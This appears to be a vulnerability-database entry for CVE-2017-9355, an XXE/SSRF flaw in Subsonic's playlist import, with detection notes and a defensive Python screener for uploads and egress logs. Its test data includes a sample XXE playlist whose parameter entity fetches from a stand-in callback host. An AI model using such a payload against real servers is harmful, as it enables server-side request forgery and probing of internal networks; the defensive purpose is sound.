CVE-2017-9355
Published 2017-06-07
Priority: P2 (score 60, high) · CVSS 3.0 base score: 7.4
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
Exploit: EPSS 26.91% (97.8th percentile)
XML external entity (XXE) vulnerability in the import playlist feature in Subsonic 6.1.1 might allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted XSPF playlist file.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| subsonic | subsonic | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests to Subsonic's import playlist endpoint for uploads of .xspf files containing DOCTYPE declarations or ENTITY definitions, which are indicative of XXE payloads.
- Detect outbound HTTP connections from the Subsonic server process carrying the Java HTTP client User-Agent header, which is the callback mechanism used in XXE/SSRF exploitation of this vulnerability.
- Alert on inbound XSPF playlist files containing XML external entity declarations (%mmmm; or similar parameter entity references) during playlist import operations.
- The XXE attack results in server-side HTTP GET requests originating from the Subsonic host to attacker-controlled or internal network targets; monitor for unexpected outbound GET requests with Java HTTP client headers from the media server.
- Exploitation requires user interaction: a user must be socially engineered into importing the malicious .xspf playlist file through the Subsonic UI.
- The XXE/SSRF attack vector can be used to pivot to internal network hosts behind a firewall, not just external internet targets, expanding the blast radius beyond the Subsonic server itself.
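As an added, constructed example (not code from the referenced advisory or from the Subsonic project), the two detection ideas above in Python: a pre-parse screen that rejects any XSPF upload carrying a DOCTYPE, an entity declaration, a parameter-entity reference or a SYSTEM/PUBLIC identifier (a legitimate XSPF playlist needs none of these), and a scan of egress-proxy log lines that flags requests from the media server which carry the JDK's default `Java/<version>` User-Agent or which target private-range addresses. The log line format, the IP addresses, the `callback.example` hostname and both playlist bodies are constructed for this example.

```python
"""Defensive checks for the XXE/SSRF pattern in CVE-2017-9355 (constructed example)."""
import ipaddress
import re
import xml.etree.ElementTree as ET
from typing import Optional
from urllib.parse import urlparse

XSPF_NS = "{http://xspf.org/ns/0/}"

# Whole DOCTYPE declaration, with its optional internal subset captured as "subset".
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b[^>\[]*(?:\[(?P<subset>.*?)\])?\s*>", re.IGNORECASE | re.DOTALL)
ENTITY_DECL_RE = re.compile(rb"<!ENTITY\b", re.IGNORECASE)
PARAM_ENTITY_REF_RE = re.compile(rb"%[A-Za-z_:][\w.:-]*;")   # e.g. %mmmm;
EXTERNAL_ID_RE = re.compile(rb"\b(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def screen_xspf(data: bytes) -> list:
    """Return the reasons an uploaded playlist should be rejected (empty list = clean)."""
    findings = []
    m = DOCTYPE_RE.search(data)
    if m is None:
        # Malformed but still suspicious: an entity declaration outside any DOCTYPE.
        if ENTITY_DECL_RE.search(data):
            findings.append("entity-declaration-without-doctype")
        return findings
    findings.append("doctype-present")
    subset = m.group("subset") or b""
    if ENTITY_DECL_RE.search(subset):
        findings.append("entity-declaration")
    if PARAM_ENTITY_REF_RE.search(subset):
        findings.append("parameter-entity-reference")
    if EXTERNAL_ID_RE.search(m.group(0)):      # SYSTEM/PUBLIC anywhere in the DOCTYPE
        findings.append("external-identifier")
    return findings


def parse_clean_xspf(data: bytes) -> list:
    """Screen first, then parse; return the track locations of a clean playlist."""
    findings = screen_xspf(data)
    if findings:
        raise ValueError("rejected XSPF upload: " + ", ".join(findings))
    root = ET.fromstring(data)
    return [loc.text for loc in root.iter(XSPF_NS + "location")]


# Constructed egress-proxy log format: <ts> <src_ip> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$')
JAVA_UA_RE = re.compile(r"^Java/\d")          # default User-Agent of the JDK HTTP client


def flag_egress(line: str, media_server_ips) -> Optional[dict]:
    """Return a finding for one log line if it looks like an XXE callback from the media server."""
    m = LOG_RE.match(line)
    if not m or m.group("src") not in media_server_ips:
        return None
    reasons = []
    if JAVA_UA_RE.match(m.group("ua")):
        reasons.append("java-http-client-user-agent")
    host = urlparse(m.group("url")).hostname or ""
    try:
        if ipaddress.ip_address(host).is_private:   # possible pivot to an internal host
            reasons.append("internal-destination")
    except ValueError:
        pass                                          # hostname, not a literal IP
    if not reasons:
        return None
    return {"ts": m.group("ts"), "src": m.group("src"), "url": m.group("url"), "reasons": reasons}


def screen_egress_log(text: str, media_server_ips) -> list:
    """Run flag_egress over every non-empty line and collect the findings."""
    hits = [flag_egress(line, media_server_ips) for line in text.splitlines() if line.strip()]
    return [h for h in hits if h is not None]


# Constructed sample inputs.
CLEAN_PLAYLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/">
  <trackList>
    <track><location>file:///music/a.mp3</location></track>
    <track><location>file:///music/b.mp3</location></track>
  </trackList>
</playlist>"""

SUSPICIOUS_PLAYLIST = b"""<?xml version="1.0"?>
<!DOCTYPE playlist [
  <!ENTITY % mmmm SYSTEM "http://callback.example/probe.dtd">
  %mmmm;
]>
<playlist version="1" xmlns="http://xspf.org/ns/0/"><trackList/></playlist>"""

EGRESS_LOG = """\
2017-06-07T10:00:01Z 10.0.0.5 GET http://callback.example/probe.dtd 200 "Java/1.8.0_131"
2017-06-07T10:00:02Z 10.0.0.5 GET http://10.0.0.20:8080/admin 200 "Java/1.8.0_131"
2017-06-07T10:00:03Z 10.0.0.7 GET http://updates.example/feed.xml 200 "Mozilla/5.0"
2017-06-07T10:00:04Z 10.0.0.5 GET http://podcast.example/rss 200 "Mozilla/5.0"
"""

if __name__ == "__main__":
    print("clean playlist tracks:", parse_clean_xspf(CLEAN_PLAYLIST))
    print("suspicious playlist findings:", screen_xspf(SUSPICIOUS_PLAYLIST))
    for hit in screen_egress_log(EGRESS_LOG, {"10.0.0.5"}):
        print("egress alert:", hit)
```

The screen runs on the raw bytes before any XML parser sees the upload, so it does not depend on how the parser is configured; the egress check is the complementary signal, and scoping it to the media server's source address keeps the Java User-Agent match from alerting on every JVM in the network.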
CVSS provenance
- NVD, CVSS v3.0: 7.4 HIGH (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N)
- NVD, CVSS v2.0: 4.3 MEDIUM (AV:N/AC:M/Au:N/C:N/I:P/A:N)
No detection rules found.
No writeups or analysis indexed.
References
- http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt
- http://packetstormsecurity.com/files/142795/Subsonic-6.1.1-XML-External-Entity-Attack.html
- https://www.exploit-db.com/exploits/42119/